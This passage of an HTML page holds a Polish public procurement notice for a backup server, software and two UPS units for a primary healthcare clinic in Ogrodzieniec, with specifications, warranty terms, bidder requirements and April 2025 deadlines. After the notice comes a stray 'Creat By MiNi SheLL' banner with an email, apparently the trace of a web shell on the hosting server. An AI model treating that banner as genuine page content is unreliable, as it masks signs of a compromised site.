Celsjusza<br/>(...) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48820000-2 - Serwery</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31682520-1 - Awaryjne urządzenia wyłączeniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z wymogami SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja producenta na serwery</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">I. Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu- Nie dotyczy.<br/>II. cd sekcji: Krótki opis przedmiotu zamówienia :<br/>28. Interfejsy komunikacyjne	USB HID<br/>29. Oprogramowanie monitorująco-zarządzające	oprogramowanie w języku polskim do zarządzania i monitorowania pracy zasilacza, wymagane wsparcie producenta (telefoniczne oraz mailowe) w języku polskim w zakresie konfiguracji oraz help desk, wsparcie dla systemów Linux, Windows oraz wirtualizacji Hyper-V, Vmware, XenServer<br/>30. Normy	PN-EN 62040-1:2009 lub równoważna, PN-EN 62040-2:2008 lub równoważna<br/>31. Deklaracje Deklaracja CE producenta sprzętu <br/>32. Gwarancja i serwis	Gwarancja - minimum 36 miesięcy na elektronikę i 24 miesiące na akumulatory, liczona od chwili podpisania protokołu odbioru bez uwag, przy czym świadczenie gwarancyjne w zakresie sprzętu realizowane będzie przez autoryzowany serwis producenta zlokalizowany w Polsce w systemie door to door, a czas reakcji serwisu nastąpi nie później niż do końca następnego dnia roboczego. Naprawa zakupionego towaru ma być dokonana w terminie max. 4 dni roboczych licząc od dnia otrzymania zawiadomienia o usterce, albo do dnia uzgodnionego z Zamawiającym (uwzględniającego czas niezbędny do usunięcia usterki). <br/>Dla wyspecyfikowanego urządzenia podane parametry są wartościami minimalnymi, sprzęt <br/>o parametrach lepszych, wyższych od wyspecyfikowanych spełnia wymagania określone przez Zamawiającego. Urządzenie powinno spełniać wszelkie przepisy dot. prawa dopuszczenia do użytkowania w Polsce oraz posiadać stosowne dokumenty świadczące o spełnianiu wszystkich niezbędnych norm i wytycznych, które powinien spełniać w/w sprzęt przed dopuszczeniem go do użytkowania.<br/><br/>Tam, gdzie w Opisie przedmiotu zamówienia został wskazany znak towarowy (marka), patent lub pochodzenie, źródło lub szczególny proces, który charakteryzuje produkty lub usługi dostarczone przez konkretnego Wykonawcę lub nastąpiło wskazanie norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 oraz ust. 3 ustawy, Zamawiający zgodnie z art. 99 ust. 5 ustawy dopuszcza złożenie oferty równoważnej lub zgodnie z art. 101 ust. 4 ustawy zaoferowanie rozwiązań „równoważnych” w stosunku do wskazanych w Opisie przedmiotu zamówienia pod warunkiem, że zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w SWZ.<br/><br/>W przypadku zastosowania materiałów, urządzeń, wyrobów lub rozwiązań równoważnych, w rozumieniu art. 99 ust. 5 lub art. 101 ust. 4 ustawy Pzp, Wykonawca zobowiązany jest do ich wskazania w ofercie oraz do złożenia wraz z ofertą kart technicznych lub innych dokumentów potwierdzających, że oferowana oferta lub rozwiązania równoważne spełniają wymagania Zamawiającego określone w opisie przedmiotu zamówienia.<br/><br/>Jeżeli Wykonawca nie złoży ww. dokumentów lub złożone dokumenty będą niekompletne (nie potwierdzając w ten sposób równoważności oferty w zakresie opisanym w opisie przedmiotu zamówienia, Zamawiający nie będzie wzywał do ich złożenia/uzupełnienia).<br/><br/>W przypadku wymagania w Opisie przedmiotu zamówienia etykiet lub certyfikatów, Zamawiający akceptuje wszystkie etykiety potwierdzające, że dane dostawy lub usługi spełniają równoważne wymagania określonej przez zamawiającego etykiety oraz certyfikaty wydane przez równoważne jednostki oceniające zgodność.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">I. Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu - Nie dotyczy.<br/>II. cd sekcji: Krótki opis przedmiotu zamówienia :<br/>1. Gwarancja: Minimum 36 miesięczna gwarancja producenta realizowana w miejscu jego instalacji (on-site) przez Producenta lub Autoryzowanego Partnera Serwisowego Producenta liczona od chwili podpisania protokołu odbioru bez uwag, przy czym świadczenie gwarancyjne w zakresie sprzętu realizowane będzie przez producenta lub autoryzowanego partnera serwisowego producenta w siedzibie Zamawiającego, a czas reakcji serwisu nastąpi nie później niż do końca następnego dnia roboczego. W przypadku awarii, dyski twarde pozostają u Zamawiającego. Naprawa zakupionego towaru ma być dokonana w terminie max. 4 dni roboczych licząc od dnia otrzymania zawiadomienia o usterce, albo do dnia uzgodnionego z Zamawiającym (uwzględniającego czas niezbędny do usunięcia usterki).<br/>Serwis powinien być świadczony w siedzibie Zamawiającego, w godzinach pracy SPOZ w Ogrodzieńcu. <br/>2. Dostępność dla osób niepełnosprawnych:	Wygląd systemu przystosowany dla osób niepełnosprawnych, np. słabowidzących.<br/>3.	Oprogramowanie backupowe<br/>(serwera backupu)	1.Rodzaj danych: typ danych, które będą objęte backupem (np. dokumenty, bazy danych, e-maile).<br/>2.Częstotliwość backupu: (np. codziennie, co godzinę).<br/>3.Metody backupu: Typy backupu, takie jak: pełny, różnicowy, przyrostowy.<br/>4.Lokalizacja przechowywania: przechowywane backupy (lokalnie, na zewnętrznym nośniku).<br/>5.Bezpieczeństwo: Szyfrowanie danych, dostęp do backupów, ochrona przed nieautoryzowanym dostępem.<br/>6.Zarządzanie wersjami: Jak będą zarządzane różne wersje plików i jak długo będą przechowywane.<br/>7.Kompatybilność: z systemami operacyjnymi Windows Serwer i Linux<br/>8.Odzyskiwanie danych: Procedury na odzyskiwanie danych z backupu.<br/>9.Monitorowanie i raportowanie: Możliwości monitorowania stanu backupu i generowania raportów.<br/>2.	Zasilacz awaryjny UPS - 2 szt.<br/>w konfiguracji nie gorszej niż:<br/>Charakterystyka / wymagania minimalne:<br/>1. Topologia	VI (line-interactive)<br/>2. Moc pozorna	2000 VA<br/>3. Moc czynna	1300 W<br/>4. Typ obudowy	rack<br/>5. Temperatura pracy	- 0 ÷ +40 °C<br/>6. Napięcie znamionowe (wartość skuteczna)	230 V AC<br/>7. Zakres napięcia wejściowego (wartości skuteczne) i tolerancja 160 ÷ 264 V (~ 145 ÷ 280 V) ± 2 %<br/>8. Częstotliwość znamionowa napięcia wejściowego	50 Hz<br/>9. Zakres częstotliwości i tolerancja	45 ÷ 55 Hz ± 1 Hz<br/>10. Progi przełączania: sieć – UPS	160 ÷ 264 V (~ 145 ÷ 280 V) ± 2 %<br/>11. Napięcie znamionowe (wartość skuteczna)	230 V AC<br/>12. Zakres napięcia wyjściowego (wartości skuteczne) i tolerancja	praca sieciowa - 184 ÷ 264 V (~ 167 ÷ 280 V) ± 2 %<br/>13. Zakres napięcia wyjściowego (wartości skuteczne) i tolerancja	praca rezerwowa - 230 V ± 5 %<br/>14. Regulacja napięcia	Automatyczna regulacja napięcia (AVR)<br/>15. Kształt napięcia wyjściowego (przy pracy rezerwowej / sieciowej) -	Sinusoidalny / Tak jak na wejściu<br/>16. Częstotliwość znamionowa napięcia wyjściowego	50 Hz<br/>17. Filtracja napięcia wyjściowego	LC, Filtr przeciwzakłóceniowy RFI/EMI, tłumik warystorowy<br/>18. Progi przełączania	UPS – sieć	~165 V / 259 V (~ 150 V / 275 V) ± 2 %<br/>19. Czas przełączenia na pracę rezerwową 3 ms<br/>20. Czas powrotu na pracę sieciową	0 ms<br/>21. Czas podtrzymania z baterii wewnętrznych <br/>(100 % / 80 % / 50 % Pmax)	minimum 4 / 5 / 9 min.<br/>22. Wymiary - rack (wys. x szer. x gł.) - nie większe niż 132 (3U) x 483 (&#39;19) x 400 mm<br/>Masa zasilacza	nie większa niż 29,5 kg<br/>23. Zabezpieczenie wejściowe	Przeciwzwarciowe – Bezpiecznik automatyczny 16 A / 250 V AC, Przeciwprzepięciowe<br/>24. Zabezpieczenie wyjściowe	Elektroniczne – przeciwzwarciowe i przeciążeniowe<br/>25. Przyłącze zasilania UPS	IEC320 C14<br/>26. Przyłącza wyjściowe (liczba i typ gniazd)	6xIEC320 C13<br/>27. Sygnalizacja	Akustyczno – optyczna; diody LED (minimum sygnalizujące naładowanie/rozładowanie akumulatorów, obciążenie, tryb pracy, zadziałanie AVR)<br/>(...)</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Zamawiający nie stawia wymogu złożenia wraz z ofertą przedmiotowych środków dowodowych.<br/>2.	W przypadku zastosowania materiałów, urządzeń, wyrobów lub rozwiązań równoważnych w rozumieniu art. 99 ust. 5 lub art. 101 ust. 4 ustawy, Wykonawca zobowiązany jest do ich wskazania w ofercie oraz do złożenia wraz z ofertą kart technicznych lub innych równoważnych dokumentów potwierdzających, że oferowana oferta/rozwiązania równoważne spełniają wymagania Zamawiającego opisane w przedmiocie zamówienia.<br/>Jeżeli Wykonawca nie złoży ww. dokumentów lub złożone dokumenty będą niekompletne (nie potwierdzając w ten sposób równoważności oferty w zakresie opisanym w opisie przedmiotu zamówienia, Zamawiający nie będzie wzywał do ich złożenia/uzupełnienia). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Wraz z ofertą należy złożyć:<br/>1.1.	Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, o niepodleganiu wykluczeniu z postępowania, w zakresie wskazanym w rozdziale V SWZ – zgodnie z załącznikiem nr 2 do SWZ. Oświadczenie stanowi dowód potwierdzający brak podstaw wykluczenia na dzień składania ofert. Oświadczenie składa się, pod rygorem nieważności, w formie elektronicznej (w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/><br/>1.2.	Załącznik nr 1A do SWZ – Szczegółowa oferta przedmiotowa, który należy złożyć pod rygorem nieważności, w formie elektronicznej (w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>1.3.	Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego.<br/>Pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. W przypadku, gdy pełnomocnictwo zostało wystawione w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu, opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenia zgodności cyfrowego odwzorowania z pełnomocnictwem w postaci papierowej, może dokonać mocodawca (osoba/osoby wystawiające pełnomocnictwo) lub notariusz.<br/>1.4.	Spis wszystkich załączonych dokumentów (spis treści) – zalecane, niewymagane. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z<br/>dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz z ofertą stosowne<br/>pełnomocnictwo – zgodnie z ust. 3.2. rozdz. XI SWZ – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do<br/>występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>Uwaga:<br/>Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą albo z umowy<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie<br/>(przez każdego z Wykonawców lub upoważnionego pełnomocnika).<br/>5. W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców oświadczenie, o którym mowa w art.<br/>125 ustawy (ust. 3.1. rozdziału XI SWZ) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie<br/>ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu, oraz brak podstaw<br/>wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z<br/>postępowania w oparciu o wskazane w SWZ podstawy wykluczenia. <br/>6. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający zastrzega sobie możliwość dokonania zmian w umowie w przypadkach i na warunkach jak niżej:<br/>1) Zmiana wynagrodzenia - może nastąpić w przypadku zmiany w trakcie obowiązywania niniejszej umowy stawki podatku<br/>VAT, zgodnie z wprowadzonymi przepisami,<br/>2) zmiana przedmiotu umowy polegająca na zastąpieniu urządzenia wymienionego w ofercie Wykonawcy innym<br/>urządzeniem, pod warunkiem zachowania minimalnych parametrów<br/>i pierwotnego przeznaczenia zastępowanego urządzenia (wynikających z opisu przedmiotu zamówienia lub kryteriów oceny<br/>ofert), w przypadku: zaprzestania produkcji urządzenia wymienionego w ofercie Wykonawcy przez jego producenta.<br/>Wykonawca musi przedstawić oświadczenie producenta sprzętu o zaprzestaniu produkcji w/w urządzenia.<br/>3) Zmiany terminu realizacji przedmiotu umowy:<br/>a) z przyczyn obiektywnych i niezależnych od Wykonawcy i producenta to jest<br/>w przypadku braku komponentów lub materiałów na rynku do produkcji sprzętu objętego niniejszą umową.<br/>Wykonawca musi przedstawić oświadczenie producenta sprzętu jakich komponentów lub materiałów brakuje do wykonania<br/>umowy w terminie,<br/>b) w przypadku zmiany terminu realizacji Projektu i jego poszczególnych etapów,<br/>c) w następstwie siły wyższej - rozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do<br/>przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności a które<br/>uniemożliwia Wykonawcy wykonanie przedmiotu umowy. W razie wystąpienia siły wyższej Strony umowy zobowiązane są<br/>dołożyć wszelkich starań w celu ograniczenia do minimum opóźnienia w wykonywaniu swoich zobowiązań umownych,<br/>powstałego na skutek działania siły wyższej. (Pod pojęciem siły wyższej rozumie się w szczególności zdarzenia i<br/>okoliczności takie jak: klęska żywiołowa, działania wojenne, rebelie, terroryzm, rewolucja, powstanie, inwazja, bunt,<br/>zamieszki, strajk spowodowany przez inne osoby - nie związane z realizacją umowy, itp.),<br/>Termin wykonania umowy ulega odpowiednio zmianie o okres trwania okoliczności celem wykonania przedmiotu umowy w<br/>sposób należyty. Zmiana terminu realizacji następuje o okres w którym wystąpiły wyżej wymienione okoliczności<br/>warunkujące zmianę terminu wykonania umowy.<br/>2. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności<br/>takiej umowy. W przypadku wystąpienia okoliczności stanowiących podstawę do zmiany umowy, każda ze Stron może<br/>wystąpić z wnioskiem na piśmie w sprawie możliwości dokonania takiej zmiany. We wniosku należy opisać, uzasadnić<br/>okoliczności warunkujące zmianę oraz dołączyć stosowne dokumenty – dotyczy to przypadków kiedy dla potwierdzenia<br/>dokonania zmiany zasadnym jest przedłożenie odpowiednich dokumentów.<br/>3. Zmiana postanowień niniejszej umowy może nastąpić jedynie wtedy, gdy nie jest ona sprzeczna z ustawą Prawo<br/>zamówień publicznych i wymaga zachowania formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy e-Zamówienia zakładki „Oferty/wnioski” widocznej w podglądzie przedmiotowego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-07 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Ofertę należy sporządzić na formularzu oferty lub według takiego samego schematu, stanowiącego załącznik nr 1 do<br/>SWZ.<br/>Ofertę należy złożyć pod rygorem nieważności w formie elektronicznej (w postaci elektronicznej opatrzonej kwalifikowanym<br/>podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>2. Oferta wraz z załącznikami musi być złożona za pośrednictwem zakładki „Oferty/wnioski” udostępnionej na platformie<br/>ezamówienia.<br/>3. Zamawiający wykluczy z post. Wykonawcę w przypadkach, o których mowa w art. 108 ust. 1 pkt 1-6 ustawy (obligatoryjne przesłanki wykluczenia) oraz w przypadkach, o których mowa w art. 7 ust. 1<br/>ustawy z dnia 13 kwietnia 2022 r. o szczeg. rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego.<br/>4. Zamawiający wymaga złożenia oświadczenia, o którym mowa w art 125 ust 1 ustawy Pzp tylko w zakresie<br/>potwierdzającym brak podstaw wykluczenia z postępowania.<br/>5. Pełna nazwa zamówienia:<br/>Dostawa serwera backupowego wraz z oprogramowaniem serwerowym i backupowym oraz serwera<br/>do archiwizacji bazy danych oprogramowania do obsługi poradni, archiwizacji dokumentacji medycznej, skanów<br/>dokumentów dołączanych do dokumentacji wraz z dwoma zasilaczami awaryjnymi UPS realizowane w ramach projektu pod<br/>nazwą „Wsparcie podstawowej opieki zdrowotnej (POZ)”.<br/>6. Po wyborze najkorzystniejszej oferty, w celu zawarcia umowy w sprawie zamówienia publicznego, Wykonawca<br/>zobowiązany będzie do:<br/>1) Złożenia dokumentu pełnomocnictwa dla osoby zawierającej umowę w imieniu Wykonawcy, o ile upoważnienie do<br/>reprezentowania Wykonawcy nie wynika z dokumentów rejestrowych Wykonawcy, jeżeli Zamawiający może je uzyskać za<br/>pomocą bezpłatnych i ogólnodostępnych baz danych, lub dokument pełnomocnictwa nie został wcześniej złożony w trakcie<br/>postępowania o udzielenie zamówienia,<br/>2) W przypadku dokonania wyboru najkorzystniejszej oferty złożonej przez Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia należy przedłożyć umowę regulującą współpracę tych podmiotów (np. umowa konsorcjum, umowa<br/>spółki cywilnej),<br/>3) Złożenia oświadczenia producenta o spełnieniu minimalnych wymaganych parametrów określonych w OPZ,<br/>4) Złożenia kart katalogowych (produktowych) zaoferowanego sprzętu w języku polskim.

Creat By MiNi SheLL
Email: jattceo@gmail.com